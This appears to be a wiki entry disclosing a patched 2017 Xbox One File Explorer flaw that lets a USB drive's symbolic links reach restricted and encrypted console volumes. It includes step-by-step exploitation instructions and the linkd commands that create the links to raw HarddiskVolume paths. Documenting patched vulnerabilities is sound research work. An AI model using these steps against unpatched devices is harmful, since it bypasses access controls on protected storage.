Skip to content

File Explorer - Symbolic links vulnerability

Metadata

Release date 02.06.2017
Author xenomega
Classification File Access
Patched yes
Patch date 05.05.2017
First patched system version 10.0.15063.2022 (RS2_RELEASE_XBOX_1704.170501-1052)
Source https://github.com/Xenomega/xsymlink
Download Download

Info

Access restricted/encrypted volumes using the Xbox File Explorer.

  • Patched as of 5/5/2017: 10.0.15063.2022 (RS2_RELEASE_XBOX_1704.170501-1052). Thus in accordance with responsible disclosure.
  • The Xbox One File Explorer does not check if a path is a symbolic link elsewhere, allowing an attacker to browse/read/write to mounted volumes which are normally restricted.
  • This includes any encrypted virtual harddisk partitions (XVD files) which the console mounts for content such as gamesaves, etc.

Prerequisites

  • Download Windows Server 2003 Resource Kit Tools, from which you'll need the "linkd" utility, as the program relies on it to create links, since mklink does not link to paths that do not exists, and the paths we intend to link to are likely non-existent on your computer.

Instructions

  • Change the drive letter to your USB drive letter in Program.cs
  • Run it
  • Plug it into Xbox, use File Browser to browse through the symlinks, which will link to other parts of the system.

Manual instructions

The following snippet assume that your usb flash drive is mounted to E:\ on your computer that's executing linkd.

mkdir E:\symlinks
linkd.exe E:\symlinks\Volume0\ \\?\GLOBALROOT\Device\HarddiskVolume0\
linkd.exe E:\symlinks\Volume1\ \\?\GLOBALROOT\Device\HarddiskVolume1\
linkd.exe E:\symlinks\Volume2\ \\?\GLOBALROOT\Device\HarddiskVolume2\
linkd.exe E:\symlinks\Volume3\ \\?\GLOBALROOT\Device\HarddiskVolume3\
linkd.exe E:\symlinks\Volume4\ \\?\GLOBALROOT\Device\HarddiskVolume4\
linkd.exe E:\symlinks\Volume5\ \\?\GLOBALROOT\Device\HarddiskVolume5\
... etc ...

NOTE: You might be able to use junction.exe from Sysinternals too!

Authors: tuxuser